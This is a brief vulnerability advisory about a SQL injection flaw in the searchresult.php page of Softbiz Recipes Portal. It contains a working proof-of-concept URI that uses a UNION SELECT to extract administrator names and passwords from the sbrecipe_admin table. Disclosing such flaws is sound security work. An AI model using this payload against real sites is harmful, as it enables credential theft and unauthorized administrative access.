Softbiz Recipes Portal Searchresult.PHP SQL Injection Vulnerability

Softbiz Recipes Portal Searchresult.PHP SQL Injection Vulnerability

Attackers can use a browser to exploit this issue.

The following proof-of-concept URI is available:

http://www.example.com/searchresult.php?sbcat_id=999999%20union/**/select/**/0,sbadmin_name,2,3,4,5,6,7,8,9,10,11,12,13,14,15,sbadmin_pwd,17,18,19,20,21,22/**/from/**/sbrecipe_admin/*